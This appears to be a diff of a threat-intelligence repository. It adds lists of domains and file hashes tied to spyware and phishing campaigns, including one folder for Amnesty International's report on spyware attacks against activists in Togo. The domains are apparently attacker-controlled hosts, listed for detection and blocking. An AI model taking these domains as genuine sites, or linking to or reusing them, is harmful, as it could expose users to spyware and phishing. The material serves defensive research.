allthemakeupyouneed.com
allthesongsyoulike.com
alluneed4home.net
android-core.org
android-updates.net
apiapple.com
apiwacdn.com
appointments-online.com
arabnews365.com
arab-share.com
arabworld.biz
arabworldnews.info
around-theglobe.co
ar-tweets.com
atlaslions.info
autodiscount.info
banca-movil.com
bargainservice.online
beautifulhousesaroundme.com
beethoventopsymphonies.com
benjamin-taganga.info
bestadventures4u.com
bestcandyever.com
bestfoods.co
bestfriendneedshelp.com
bestheadphones4u.com
besthotelsaroundme.com
bestperfumesnow.com
bestpresents4all.net
bestsalesaroundme.com
beststores4u.com
bestsushiever.com
better-deal.info
bicyclerentalnow.com
biggunsarefun.com
bl33pon6373.com
blackwhitebags.com
booking-tables.com
boysrbabies.co
breakfastisgood.com
breaking-extranews.online
breakingnewsasia.com
breaking-news.co
breakthenews.net
br-hashtags.com
brighttooth.net
brownandblueeyes.com
browser-update.online
br-travels.com
buildurlife.net
bunchi.club
businesssupportme.com
business-today.info
bussybeesallover.com
buymanuel.co
buypresent4me.net
calendarsapp.com
carrefour-des-affaires.com
cars-to-buy.com
cashandlife.com
casia-news.info
catfoodstorage.net
catsndogsproducts.com
cdnupdateweb.com
cdnwa.com
cell-abonnes.com
cellphonesprices.com
cellular-updates.com
cellularupdates.info
cellular-updates.online
centrasia-news.com
cheapapartmentsaroundme.com
cheaphostingtoday.com
cheapmotelz.net
cheapsolutions4u.com
cheaptransporting.net
check-my-internetspeed.com
chocolateicecreamlovers.com
chocollife.me
chubaka.org
classic-furnitures.com
clickrighthere.online
coffecups.online
coffee2go.org
colorfulnotebooks.com
colorsoflife.online
columbus-parking.com
coolasiankitchen.com
coolbbqtools.net
coolmath4us.net
cool-smartphone-apps.com
coupedumondepro.com
couponshops.info
cpr-appointments.com
cryptocurrecny.com
cryptokoinz.com
cryptopcoinz.com
csomagodjott.com
daily-sport.news
dancinglife.co
deal4unow.com
delivery-24-7.com
dental-care-spa.net
deportesinfo.com
diaspora-news.com
dinneraroundyou.com
discountmarkets.info
discountstores.info
discoveredworld-news.com
dogfoodstorage.net
dogopics.com
doitformom.com
doitforthefame-now.com
do-itonyour-own.com
domain-redirect.com
domainsearching.net
domainsearching.net
domain-security.org
donateabox.co
donateaflower.com
done.events
dowhatyouneed.com
dynamic-dns.net
easybett.online
easy-pay.info
ecommerce-ads.org
economic-news.co
editorscolumn.net
egov-online.com
egov-segek.info
egov-sergek.info
ehistorybooks.com
ehistorybooks.com
elitecarz.net
eltiempo-news.com
emonitoring-paczki.pl
entertainmentinat.com
e-prokuror.info
e-sveiciens.com
eura-cell.com
eurasianupdate.com
eurosportnews.info
event-reg.info
ex-forexlive.com
extrahoney.net
ezdropshipping.net
fabric-shops.com
face-image.com
fadi7apress.com
fantastic-gardens.com
fashion-live.net
fashion-online.net
fashionpark.info
fastfixs.net
femmedaffaire.com
fiestamaghreb.com
files-downloads.com
findavoucher.online
findgoodfood.co
finditout-now.com
findmyass.org
findmyfriendsnow.com
findmylunch.org
findmymind.co
findmyplants.com
findouthere.org
fishingtrickz.com
fitness-for-ever.com
flights-report.com
flights-todays.com
flying-free.online
fofopiko.org
foodforyou.info
foodiez.online
foto-top.info
foudefoot.live
freedominfo.net
freelancers-team.org
free-local-events.info
freshandsoftbread.com
freshsaladtoday.com
fundum8430.com
funinat.com
funinthesun4u.com
funintheuk.com
funnytvclips.com
fwupdating.com
gadgetsshop.info
getagift.info
getoutofyourmind.com
getphotosinstant.net
glassesofwine.com
globalsupporteam.com
golf-news.live
goodcookingonline.com
goodflowersinside.com
good-games.org
goodthoughts4u.com
goroskop.co
gostatspro.com
go-trip.online
gulfca.net
gulf-financials.com
gulf-news.info
hairdresseraroundme.com
halal-place.com
handcreamforyou.com
handymanwood.com
happiness4us.com
hdsoccerstream.com
health-club.online
hellomydaddy.com
hellomymommy.com
highclassdining.net
hmizat.co
holiday4u.work
homeishere.co
homemadecandies.net
host-one-more.com
hotelsauto.co
hotels-review.org
hotelstax.co
hotelsurvey.info
hothdwallpaperz.com
hotinfosource.com
hot-motors.com
housesfurniture.com
housing-update.com
howisurday.com
howtoexplorebirds.com
howtomakeavocadotoastandegg.com
hracingtips.com
icecreamlovesme.com
igiheonline.com
ilovemybeatifulnails.com
ilovemymilf.com
income-tax.online
indrive.info
ineediscounts.com
info24.live
infospotpro.com
infospress.com
insta-foto.net
internetmobilespeed.com
intim-media.net
investigationews.com
in-weather.com
islamic-news-today.com
islamiyaat.com
islam-today.info
islam-world.net
istgr-foto.com
iwantitallnow.com
jaimelire.net
just-one-left.com
karbalaeyat.com
kaspi-payment.com
keyindoors.com
kingdom-deals.com
kingdom-news.com
klientuserviss.com
koramaghreb.com
kurjerserviss.com
labonneforme.net
leadersnews.org
leggingsjustforyou.com
legyelvodas.com
legyelvodas.com
legyelvodas.net
leleader.org
leprotestant.com
lesbonnesaffaires.online
lesportail.biz
liam-ryan.co
license-updater.com
lifedonor.net
like-the-rest.com
live-once.net
loading-images.com
loading-pag.net
localgreenflowers.com
loisiragogo.com
lonely-place.com
looking-for-two.com
lookitupnow.website
look-outsidenow.com
loschismescalientes.com
losnegocios.biz
lost-n-found.net
loveandhatenow.com
maghrebfoot.com
maghrebfunny.biz
mamba-live.com
mapupdatezone.com
massagetax.co
maymknch2026.co
medical-updates.com
megacenter.info
mercedesbenz-vip.com
mideast-today.com
miles-club.com
miralo-rapidamente.com
mobile-softs.com
mobile-update.online
mobile-updates.info
mobileweatherweb.com
mobi-up.net
moh-followup.com
moh-online.com
mondaymornings.co
moneycoincurrency.com
moneydigitalcurrency.com
moneyxchanges.com
mosque-salah.com
mosque-salah.net
mosquesfinder.com
motordeal.info
movie-tickets.online
moyfoto.net
m-resume.com
muftyat.com
muslim-world.info
muzicclips.com
mybrightidea.co
mydailycooking.net
myfiles.photos
myfreecharge.online
mygreathat.com
mykaspi.com
mylovelypet.net
mymobile-cell.com
mypostservice.online
my-privacy.co
mysadaga.com
myshoesforever.com
myshop4u.net
mystulchik.com
mysuperheadphones.co
mysuperheadphones.co
myukadventures.com
nation24.info
nationalleagues.net
nbrowser.org
newandfresh.com
newandroidapps.net
newarrivals.club
newarrivals.club
newcooking.org
newdailycoupons.com
newmodel.online
newmodel.online
newnhotapps.com
news-alert.org
newscurrent.info
newsdirect.online
news-gazette.info
newsofficial.info
newsofgames.com
newsofthemoment.net
newworld-news.com
nightevents.info
noextramoney.com
noloveforyou.com
nomorewarnow.com
noonstore.sale
noor-alhedaya.com
normal-brain.com
nosalternatives.com
nothernkivu.com
noti-global.com
noti-hot.com
noti-hoy.co
notisms.net
notresante-infos.com
nouveau-president.com
nouvelles247.com
novosti247.com
nuevaidea.co
odnoklass-profile.com
offresimmobilier.com
ok-group.org
one-isnot-enough.com
onetreeinheaven.com
online-dailynews.com
onlinefreework.com
onlineshopzm.com
onlygossip.info
only-news.net
onlytoday.biz
onthegoodtime.com
operatingnews.com
orange-updates.com
ourorder.info
outletsaroundme.com
outletstore.tech
papers2go.co
park4free.info
pastesbin.com
pathtogo.net
pay-city.com
paynfly.info
paywithcrytpo.com
phonering4you.com
photo-my.net
pickcard.info
picture4us.com
pine-sales.com
pizzatoyourplace.com
playwithusonline.com
pochta-info.com
politica504.com
politicalpress.org
politiques-infos.info
postainf.net
posta.news
ppcisdead.com
prikol-girls.com
privo7799add.net
promosdereve.com
promotionlove.co
promotionlove.co
puffyteddybear.com
purple-enveloppe.com
quitmyjob.xyz
quran-quote.com
rainingcats.net
readingbooksnow.com
regionews.net
reklamas.info
rentmotors.net
research-archive.com
reseausocialsolutions.co
reservationszone.com
reseufun.com
resolutionsbox.com
restaurantsstar.com
revolution-news.co
rewards-club.info
rockmusic4u.com
rockstarpony.com
rosegoldjewerly.com
rosesforus.com
russian4u.net
saladsaroundme.com
same-old.net
savemoretime.co
saveurday.net
securesmsing.com
sergek.info
services-sync.com
service-update.online
shia-voice.com
shia-voice.com
shoppingdailydeals.net
shortfb.com
shuturl.com
signpetition.co
site-redirecting.com
smarttarfi.com
snoweverywhere.com
soccerstreamingstars.com
social-life.info
somuchrain.com
so-this-is.com
specialgifts4all.com
sportupdates.info
sportupdates.online
sputnik-news.info
starbuckscoffeeweb.com
stars4sale.co
start2playnow.com
starting-from0.com
statisticsdb.net
stopmysms.com
stopsms.biz
sunday-deals.com
supportonline4me.com
surprising-sites.com
sync-cdn.com
syncmap.org
tablereservation.info
takethat.co
tastyteaflavors.com
telecom-info.com
tengrinews.co
theastafrican.com
thebestclassicalmusic.net
thecoffeeilove.com
thehighesttemple.com
thehoteloffers.com
the-only-way-out.com
theshopclub.org
thespaclub.net
theway2get.com
ticket-aviata.info
tiketon.info
tlgr-me.org
tobepure.com
tommyfame.com
top100vidz.com
top10gifts4men.com
top10leadsgen.com
topbraingames4u.com
topten-news.info
touristvaca.com
tradeexchanging.com
traffic-pay.com
traffic-updates.info
travel-foryou.online
travelight.online
traveltogether.link
tricksinswiss.com
trililihihi.com
t-support.net
turismo-aqui.com
tvshowcusting.com
un-limitededitions.com
unsubscribed.co
untoldinfo.net
updateapps.net
upgrade-sim-card.com
upload-now.net
uptownfun.co
urbestfriends.com
url-redirect.com
urlsync.com
urspanishteacher.net
utensils.pro
vanillaandcream.com
vastdealsnow.com
verify-app.online
videosdownload.co
videotubbe.net
vider-image.com
viedechretien.org
vie-en-islam.com
viewhdvideos.com
vipmasajes.com
viva-droid.com
vivrechezsoi.info
vkan-profile.com
volcanosregion.com
waffleswithnutella.com
watersport4u.net
weather4free.com
weatherapi.co
web-config.org
websites4yourhost.com
web-viewer.online
welovebigcakes.com
welovelollipops.com
welovemorningcoffees.com
wewantflowersnow.com
whatcanidowithbirds.com
whats-new.org
whereismybonus.com
whereismyhand.com
whereisthehat.com
windyone.net
wintertimes.co
wonderfulinsights.com
woodhome4u.com
xchange4u.net
xchangerates247.net
xn--nissn-3jc.com
xn--noki-t5b.com
xn--telegrm-qbd.com
xtremelivesupport.com
youcantpass.com
yourbestclothes.com
yourbestefforts.com
yourbestvaca.com
yourgreatestsmartphone.com
yourhotelreservation.info
yummyfoodallover.com
zednewszm.com
zm-banks.com
zm-banks.com
zm-weather.com
zsports-info.com

View File

@@ -0,0 +1,688 @@
301-redirecting.com
365redirect.co
accomodation-tastes.net
accountant-audio.com
accountcanceled.com
accountsections.com
active-folders.com
additional-costs.com
addresstimeframe.com
ad-generator.net
adscreator.net
adsload.co
ad-switcher.com
advert-time.com
advert-track.com
agilityprocessing.net
alignmentdisabled.net
allergiesandcooking.com
alpharythme.com
apigraphs.net
appleleaveit.co
applicationcreation.net
a-redirect.com
a-resolver.com
arrowowner.com
assembled-battery.com
audienceflake.com
auditorcast.com
authenticangry.com
authenticated-origin.com
authlovebirth.com
autoredirect.net
avocadofight.com
av-scanner.com
awardpractice.com
axis-indication.net
babies-bottles.com
balancewreckpoint.com
bdaynotes.com
beanbounce.net
becomeiguana.com
behindaquarium.com
betterapplesearch.com
betterhandsblack.com
bigseatsout.net
billednorth.com
birdbathmorning.com
biscuit-taste.net
bitanalysis.net
bitfadepens.com
bitforeat.net
black-bricks.net
blindlydivision.com
blockedsituation.net
blogreseller.net
boldconclusion.com
bottlehere.com
boxes-mix.net
brand-tech.net
bubblesmoke.net
bubblesweetcake.com
buildingcarpet.com
buildyourdata.com
bulktheft.com
bulk-theft.net
bullgame.net
bundlestofear.com
bustimer.net
butterdogchange.com
cablegirls.net
calculatesymbols.com
candlealbum.com
carpetdignity.com
cartsafer.com
cashtowebmail.com
catbrushcable.com
celebrateyourdaynow.com
cellphone-inside.org
centersession.com
changesstarted.net
chatresponses.com
cheapcardonline.com
checkboxcart.com
checkboxfee.com
chickenwaves.com
chormnet3.com
classstylemap.com
cleanmiddle.com
clicktrack247.com
clients-access.com
clockmarkcoffee.com
closefly.com
cloudads.net
cloudbiggest.com
clubloading.net
clubsforus.net
companybreakfast.net
computer-set.com
com-reports.net
conditionalcell.com
conference-ballroom.com
confusedmachine.com
connecting-to.com
contacting-customer.com
content-blocking.net
contentsbycase.com
convertedversion.com
cookiescom.com
cookiesoutthere.com
cornclean.com
cottondecay.com
countrytrips.net
crimebackfire.com
crosslocated.net
crowndecoration.net
crownsafe.net
cssgraphics.net
cupscars.net
curiousrabbitgame.com
currentscan.net
currentwestpeople.com
dancersing.net
dashboardprompt.com
databasemeans.net
data-formula.com
deadwordsstory.com
dearlegendseed.com
designednetwork.com
destinytool.net
detailrush.net
deter-individuals.com
devicer.co
dhcpserver.net
diagram-shape.com
diningip.com
directbegins.com
directlyforuse.com
directurl-loading.com
discountads.net
displaytag.net
dns-1.co
dns-analytics.com
dnsclocknow.com
dns-direct.net
dnslogs.net
dnsmachinefork.com
dnsprotector.net
dnsroof.com
dns-upload.com
domain-control.net
domainloading.net
domainport.net
domain-resolver.net
domain-routing.com
domains-resolver.net
domesticwindow.com
donateyouroldclothes.net
donefordeal.com
doorcoffeebrown.com
dotroomeight.com
downgradeproduct.com
dramatic-challenge.com
driventicket.com
eardooraround.com
earsstrawsfive.com
effectivespeech.net
elementscart.com
eliminateadjust.com
e-loading.biz
email-plans.com
energy-dispatch.net
enoughtoday.org
entire-cases.com
equal-gravity.com
estatearea.net
everycolor-inside.com
everyuse.org
exchangenames.net
exchangenerate.com
existingpass.com
exoticsendurance.com
expired-getway.net
expiredsession.com
expiringdate.com
exploreemail.net
extend-list.net
externalprivacy.com
externaltransfers.com
extractsight.com
eyestoip.com
eyesunderspray.com
fadewallwine.com
fallround.com
fallsjuice.com
familyabroad.net
fashioncontainer.net
fastdirect.net
fatpop.net
feature-publish.net
feelbonesbag.com
feeltrail.com
fetchlink.net
filingwarranty.com
financecomments.net
firebulletfan.com
flashobligation.com
flashtraininggoal.com
flynewfries.com
foodeveryhour.com
forgetjustit.com
formatpainter.net
formattingcells.com
forward5costume.com
forward-page.com
free247downloads.com
freeshoemoon.com
functionalcover.com
gadgetproof.net
gate-sync.net
gearstereotype.com
getpoints.net
getspeednows.com
gettingchances.com
gettingurl.com
girlimstill.com
girlsyoulike.com
glasstaken.com
glittercases.net
globalcoverage.co
global-redirect.net
greatcitymore.com
greenbusnoise.com
greensmallcanvas.com
greenwatermovement.com
growstart.net
guardnotes.com
gumclockberry.com
handcraftedformat.com
hardthinmetal.com
hatsampledc.com
healthyguess.com
healthykids-food.com
hearsmugglergarden.com
heavy-flood.com
hillsaround.com
hitrafficip.com
holdingspider.com
holdmydoor.com
holdstory.com
holecatorange.com
horsefingercoffee.com
host-redirect.net
htmlmetrics.com
htmlstats.net
httpaccess.com
humandiven.com
humblebenefit.com
hundredsofdesigns.net
in2date.com
inbox-messages.net
industry-specialist.com
insertfilters.net
investormanage.net
ipjackets.com
ipurlredirect.com
itsthebrowser.com
judgeauthority.com
keepiptext.com
keepthiseasy.com
keynotepalm.com
knowingfun.com
knowseminar.com
landflatheart.com
landstofree.com
laptop-parts.org
last-chainleash.net
lawlowvat.net
layerprotect.com
layoutfill.com
leavehomego.com
legsfriesears.com
letyoufall.com
levelsteelwhite.com
lifenoonkid.com
limitedfeature.com
link-crawler.com
linking-page.com
link-scan.net
linksnew.info
littlefrogalarm.com
lizzardsnail.com
loading-ads.net
loading-domain.com
loadingpage1.net
loadingpage4.net
loading-page.net
loading-url.net
loadingurl.net
loadthatpage.com
looklifewhite.com
lowervalues.com
magicalipone.com
mailappzone.com
maingreatessay.com
mainredirecter.com
managedsnap.com
management-help.com
managingincluded.com
manydnsnow.com
maphonortea.com
martinipicnic.com
mealrentyard.com
meanspursuit.com
medicalcircle.net
merchant-businesses.com
mergeandcenter.com
methodslocal.com
mgifweb.com
mirrorgossip.com
mixershake.net
mixsinger.com
mobilebrowsing.net
mobilephonesme.com
modifytimezone.net
moneycheesecolor.com
moregatesthere.com
morning-maps.com
motiontastebad.com
motivation-go.com
mozillaname.com
multiplecurrencies.com
music-electric.org
music-headphones.org
muziclovers.org
mydarkarms.com
myfundsdns.com
mygummyjelly.com
myheartbuild.com
mylogfrog.com
mymanagement-service.com
mynewbesttime.com
myseesea.com
myself-dns.com
natural-ice.com
navywalls.com
nerdtvfan.com
net-protector.com
netstatistics.net
netvisualizer.com
network-bots.com
networkinfo.org
networkingloading.com
networkingproperty.com
neutralpages.com
neverwayneck.com
newenvelope.net
newipconfig.com
newip-info.com
newredirect.net
news-news.co
nicevibezaction.net
nightscloudwant.com
noodlegray.com
normalseason.com
normal-strength.com
nosemorningnine.com
notificationsneeded.com
noveletters.com
novoicenoprob.net
now-online.net
objectreduction.com
offspringperform.net
old-glasses.net
oldmywater.com
oneleadingchat.com
online-loading.com
onlycart.net
onlywebsite.org
openingquestion.org
operations-delivery.com
operations-shifts.com
opera-van.com
opposedarrangement.net
optionalshift.online
optionstoreplace.com
organicdiamonds.net
ourperfume.net
outgoingurl.com
page-host.net
page-info.com
pageisloading.net
pageredirect.co
pageupdate.co
painruncart.com
painting-walls.com
panelbreed.com
papervoice.net
particularmechanic.net
parties-fun.com
pc-views.net
performinghost.com
permalinking.com
phonemetrics.co
phonestats.net
physicalcheetah.com
pincattape.com
planeocean.com
playfantasticsplastic.com
pleaseusenew.com
pleaseusenew.net
popagency.net
popularmessages.net
port-connection.com
portredirect.net
possibilitytotransfer.com
pourcentfilers.com
poweredbycpanel.com
poweredlock.com
pprocessor.net
practical-basis.net
practicehazard.com
preferenceviews.com
preferring.org
presidentialagent.com
preventadmission.com
preventsusing.com
pride-industry.com
pride-industry.net
pridetomyself.net
primarystrike.net
prioritytrail.net
productsall.net
productsview.co
projectgoals.net
proudmorale.com
pub-dns.com
publishbig.net
purchaseusingcoins.com
puttylearning.com
qualityfeeling.net
quota-reader.net
raininscreen.com
randomlane.net
rapidredirecting.com
raresound.org
raw-console.com
reachcomputer.com
readirectly.com
realmythtrend.com
receiptpending.net
reception-desk.net
recordinglamping.com
redemptionphrase.com
redirect2url.net
redirectchannel.net
redirectcheck.net
redirect-connection.com
redirectconnection.net
redirectdoor.com
redirecteur.net
redirectgate.com
redirectingpage.net
redirecting-url.com
redirectingurl.net
redirectingurl.org
redirection-url.net
redirectit.net
redirectking.net
redirect-link.com
redirectload.com
redirectmotion.org
redirect-net.com
redirectnet.net
redirectool.com
redirect-protocol.com
redirectprotocol.net
redirect-service.net
redirectshare.com
redirect-systems.com
redirect-traffic.net
redirect-tunnel.net
redirect-webpage.net
redirectweburl.com
redirigir.net
reflectextension.net
regularhours.net
related-ads.com
relatedspams.net
reloading-page1.com
reloadinput.com
reloadpage.net
reload-url.com
reload-url.net
renewal-control.net
rentalindustries.com
results-house.net
revoke-dashboard.com
rhymeshey.com
righttriangle.net
roadwide.net
robotscan.net
rockbreakdown.com
safecrusade.com
safe-mondays.net
saltyapplepie.com
scannerservices.net
scaryaudience.com
scriptincluded.com
scriptsinstallers.com
searchjustdont.net
searchunit.net
sec-checker.com
securedloading.com
secured-url.net
secureyouradd.com
securisurf.com
securlaw.com
select-edition.net
send2url.com
sendhtml.net
sendingurl.com
sendingurl.net
seriousprotection.net
servingshade.com
severalheroes.com
sharepassageset.com
shipment-status.org
short-address.com
shortredirect.com
silverodgone.com
simplycode.co
site-lock.net
skillsforest.net
smallperfumerain.com
smallridebar.com
smokeshowshoe.com
smoothurl.com
social-artist.net
social-exercise.com
social-rights.com
sockstubename.com
somewarmremember.com
sparepresence.com
speechenforce.com
speedservicenow.com
spiritualbrakes.com
sportssaint.net
squaretables.net
sslbind.com
standartsheet.com
standstock.net
starreturned.com
startupsservices.net
stationfunds.net
staysystem.net
storageseminar.net
storelive.co
strangegloom.net
strategyroles.com
suitcasesmellnice.com
summermover.com
sunnydaylight.com
sunrise-brink.net
sunsetdnsnow.com
superlinks4u.com
sweetcup.co
sweet-water.org
syncingprocess.com
systemtrees.com
takecarhomes.com
takemallelectric.com
teachskate.com
techhelping.net
telephonequality.com
template-iso.net
tentrosegain.com
thankstossl.com
theappanalytics.com
thefuturearticle.net
theredirect.net
thesimplestairs.com
thoughtfulbundle.com
timelesscelebrity.com
timeofflife.com
tinyurler.com
todoinfonet.com
toggletools.com
tomorrowpastno.com
tookcheckout.com
topadblocker.net
topoems.com
towebsite.net
trade-agreement.com
transferbase.co
transferkeep.com
transferlights.com
transfer-rate.com
trendsymbol.net
trialvariable.net
trianglerank.net
tripleclickpays.com
tunnelprotocol.net
umbrellacover.net
unavailableentry.com
unionofteenagers.com
uniquesite.co
unusualneighbor.com
updating-link.com
updatingpage.com
updating-url.com
updating-url.net
updatingwebpage.com
upkeepno.com
url2all.net
urlconfig.net
url-configure.com
urlconnection.net
urldefender.net
url-direct.com
url-hoster.com
url-loading.com
urlpage-redirect.com
urlpush.net
url-redirect.net
urlredirect.net
urlregistrar.net
urlreload.net
urlscanner.net
urlupdates.com
urlviaweb.com
user-registration.com
varietyjobspaid.org
varietyregistrar.com
vault-encryption.com
viewstracker.com
volcanodistance.com
walkerpost.net
walkhatclock.com
wallagainsthall.com
walltome.com
wasted-nights.com
waterforplants.net
weakdistance.com
web-check.co
web-developper.net
web-domain.net
webexaminer.net
web-hoster.co
web-loading.com
web-loading.net
web-only.net
web-page.co
webpageupdate.co
webprotector.co
webprotocol.net
webresourcer.com
web-scanner.co
websconnector.co
websiteeco.com
websitetosubmit.com
web-spider.net
webstrings.net
websupporter.co
webtunnels.net
webupdater.net
web-url.net
webview-redirect.com
weddingbandsoft.com
wedding-strategy.com
welcomehosting.net
whereismytree.net
whynotyesterday.com
whypillyellow.com
willpurpleshe.com
winfoxflip.com
winter-balance.com
wishdownget.com
without-additional.com
witness-delay.com
wordstore.net
working-online.net
workshopmanager.net
wraptext.net
youaresostupid.net
youintelligence.com
youliehow.com
yourlastchance.net
yousunhard.com

View File

@@ -0,0 +1,26 @@
baramije.net
documentpro.org
ikomek.info
monawa3ate.org
news-flash.net
oplata-shtraf.info
pay-penalty.info
photo-afisha.net
shtraf.info
tahmilmilafate.com
tahmilmilafate.info
uidebol.info
globalnews247.net
todaysdeals4u.com
telangana-news24.com
tibetnews365.net
jeeyarworld.com
latest-songs.com
bankportal.net
gossipsbollywoods.com
redstarnews.net
secretgirlfriend.net
securedlogin.org
waitingtoload.com
websiteconnecting.com
websitereconnecting.com

View File

@@ -0,0 +1,3 @@
# Hackers-for-hire in West Africa: Activists in Togo Attacked with Indian-made Spyware
This folder contains IOCs related to the report [Hackers-for-hire in West Africa: Activists in Togo Attacked with Indian-made Spyware](https://www.amnesty.org/en/wp-content/uploads/2021/10/AFR5747562021ENGLISH.pdf) (also available in [French](https://www.amnesty.org/fr/wp-content/uploads/sites/8/2021/10/AFR5747562021FRENCH.pdf))

View File

@@ -0,0 +1,29 @@
bulk.fun
apkv5.ppadaolnwod.xyz
apkv6.endurecif.top
getelements.xyz
fiddaz.club
lif0.top
fif0.top
chipp.pw
mimestyle.xyz
mangasiso.top
and.retardrattle.website
help.domainoutlet.site
whynotworkonit.top
spectronet.pw
full.naturalpercent.life
mimeversion.top
rythemsjoy.club
lowlight.xyz
inapturst.top
auth.forwardtoken.website
accounts.loginshare.info
seahome.top
imageview.xyz
flickry.xyz
apkv2.qwertykeypad.host
userauthen.pw
join.officeframe.work
zumba.tampotrust.agency
image.loadingmessage.info

View File

@@ -0,0 +1,228 @@
000ddbb75d10a939b54a7ceea5f12563b855daec971a9da0f2b4d5f935e195a3
03d10d2682093fa126f0eaa5cbfd64eabbb06e151238bba1a7e261468ec4198e
066ae38cc8514c07360049099bf954e3e2470b18b19ff9fc13681b1c2e3089d5
0848541d0eda16a5c16c920916092fb0e6f1555a9b12df9f8400f70d1b4d387d
0c2494c03f07f891c67bb31390c12c84b0bb5eea132821c0873db7a87f27ccef
0efdd55f9341dcf358872cdb42c943f2457f800886f5cfeb74fa07c0f5c750e9
10143c8b913b5714688b5d439d11e3918cc45639c7725c1fc8e240e37091c354
106645830653a937cf133baefbe02ccdf8a0b55b743473b720d9129a4360bdc1
10a2d4fc913fa0931cf93c8725c1c9af20f22a4a35e619b1af17b84da326ea3f
11764af75f241ccf8642558014ba29729585850a1efac86a5a8d4c7032c9bb40
11f8d64d479013c02c5ae2429fd3b7dd4feb7cf56e17ff27b67e07b387372ab0
1220302517cc84017a2f8f3928935a06ae6eae15f5da61f40636c07989ba9683
14fb7d317fff4fa2f02e106281dafa951c635adb3151343619440964370090f1
16ab497d5b3af927264ca4ef36f605a3d0374a49c355d1a73b5a1a52a1d6c039
175c0d04e9419432d0adffece655a338f71714d2b5cdc2639d1a5c5462b4e7ac
176bb7c9b35b9d9c62a1efc4d9a3b6d91d6139c10e6fc5987fdd49a94150d97d
19a2aeb938785c98e2692dc055ac6e2844cf0e70ba80b9bc6f192ab362b8a635
1c058ea5193820102495abf25683e5ac95e508d759bfc590d08fad42a0a1af03
1c0c892678b49915487c13a0ac385d009e4f929b9f60d6f79aaec57a72aa1b01
1d6edfbf8340ce6e0edc0e9db56287a2954a3066d5f3daca68495247a9be4374
1dd890d2fee74408d9318fbca521064bea5a583cb043c6efbdcb3d0d691c12d9
2018340328ebc1290aced318898855a688e5b367461e52529da7077390dd10ce
2068cd66658eac0ac50202a9ae249e45abb4ee3c4f03f8cf8dd6998acbd75261
214d946bd40460b1742f78aef0ac2010b1d4c59d9faddfadca1875f14725622d
21e8d292059353cf519959ec32ffc279eb48febe294ee2a3543f83a7f69500e7
236e0cd0914f1851072f54f4284d5af21842e47302b391e4780a14e84abb4269
23d45ded9bce86a6f4d51d6cb5d2fd4287d518cf396a74953812549322a77f7d
25fdfe275fe67b7187e94d1f3b0bafd34262c7c8919fa04cedd820cc5a6f6e24
2606b863b512957a4af47a4ad6a319fa8e1e4349de691f30b89f1fb9acc71bb5
27fcf586d086b6621ca70682784910faa4550edebb80299a4970f9d483a5c567
28eaa3f60ad93b735c9a7089222ded98e42eedf0b3076eef92241fa8aaf5ddb3
2913f1ca567bbd09292231613c5bfbc977915f0c557aca7c721e0ba871d956ee
2941bc9cd41ab27fb59f6b1e2808840ed09003d35344d6d3d2af2b62d774b7fb
2943fc4eec81e2da6c195b6e6a4e3c9b847f0da8079044c29b21d6fb06c84f0c
2ad705b42220ebdb5a2a39366335e67feff6994efb387dc90c52eaf51c567440
2b7d1bb004a0c31e63fefa81003c7dfa7b2de794f59ac448afb832744e46752d
2dc48917fb975ac20305c675f8edbd45bd8337e833e2e74760dfd4d6472ac57f
2ee969e52af7cba25ed28cfe174323a88e1fdf34a614940a0bdf18ee860e6901
2f37e456b0a503ef85ad4f40a8ec0ca1598f070146cd42a4336d5815be4edb4a
2fb28fe0190041c47157df760dcb4f8865f2b450219016c95893d22d4eda22f0
3011075c6043c532cd8ce96c86e6074ddf319c863c8106d01697041559162ff3
30dd33186028117fa67edaa7fd45a46ccfd2ba8c5c4fb7493a6fb75d06b8cdad
33bf4ad684e519ca8fc902fb8f24bc8127d5569186d64f55417c9e5f82896991
3587b0f5d18863992dcd124b103c50ecd32a2393c2cd1c0346c3a3cf8985e107
375308b6f80e0365264a6c1ea9a5915b03162dba5fa39d199d32569cf039ed71
377c8202e9714e87b93b591e59b632c85a18a6b650eeef420296cfc4796ee727
37ac4de100bc2bcb725816bab2eee4f0d56b6a5634fc316736ab333a524c3e27
3937b796c44b9e49e9c93d60ec2b8c5274ecdd43d625c2a6fa2523c5d2100d4b
3a60e5daf2833ab37f061bf1564cdfa8392def0f47adcf866d99feb672147220
3a8ca33011e8952e03967fdcf9ccbc92c65227edde3c5ac3a0281d974398fe2e
3cf49040371ce7703ce93fd22d30549d25ecaba72b53491dfb18e55180d4d388
42a116b3db5b1142f2812b1e73cd386c4381500fb95932f36aeb752179e25ef7
46df9b77f5adbe03ed252248e5961408f8208827f4964e167356768a1fdd1b41
4789b7c5940f6482cbb1c296b58e725f7ade070d2d8181627d90db86ff75ac7a
47c5e6587e91d954455607508070648d9c3592fe6b28838f5985a237d79b4579
4a5a2aa7dfabc5392c904b023314d601b2f8ebe7f737d92a844f2eda11c5d394
4ab29d127c67cfdab035cb467082b77a2f2ab940729ac63b45a56ffb096cba09
4b6a0e72dfb8b1f9c5ddc2bc165ef3249ddca8ee343ffe07917d7dcaca3e7a88
4e0479314698e2085d7520f4afeaf8bc2f2492de389d251fc0ba7ab05a1efd0f
4e36d9346ea6f28a743957a8af3de78d95696ad22d9d2761e932b33ae7412c3d
4ed8ee387750da187bf327568d975d6e568ec6bfb92a0923e3a3cc04c6597514
5140888f90a27bd78b5d00ad36d6e481f80312262beaf0ba43ae24172dd52898
51bd8c77ca6339d5470b6bf2781b2f3237ebba39984369a18554048723040fa8
52ef591503f7ace99735cf05d37c8801986c160e98b03449270c13519d353b63
5338e321216475af588a0d27c6df6aeb9a195e1516a7a3ba780e56c1d5cbb43d
537593479b40fd59dd40cb54d3046d7bb5c71c0356d63e6819758a7af2301a77
541620be7aeca3f8e86b505edb4917183cca7bf527dd7904027b37057971dd12
555578d8d5f116c55bfe8e8ac4794ecf67193668b52222e7a8d9fa919ee6eeac
559d7dc2f2803b07264e959a0158ff05727495123b8106177a9dac9c0362c301
572d46941db9099e9a5adac9010d61cb0332175d439a7d185431616ef1efc1bd
5761d2eddab897c4c4f18f94fb99e91dea5e32efe46575d6bc8fe1e8797d4ed8
5b11c38a732f7da34e154a95e954ce6501369e3343f543444122a255daac54f9
5bc9c336fc19443d82adde7d03fd2c4b49501ed4d9da5b3f2d0ef9789e925d72
5bf56a2363bc3a40a81b6c4abcb05962efdee879328629f9d9f2545cf53d0ca0
5df353391cf558ed4c2e2cadc20b5e00dece3f74f3919adaefc39eacb12be8be
5e798ec70b8d1d2010d1287e57cde5c5c2578aed59803eb1c3c5c53a931a4f16
5f7f91f4bf4fe56e8d6ff95376039e77f93f62b8bf5c4c7020b70706a9543549
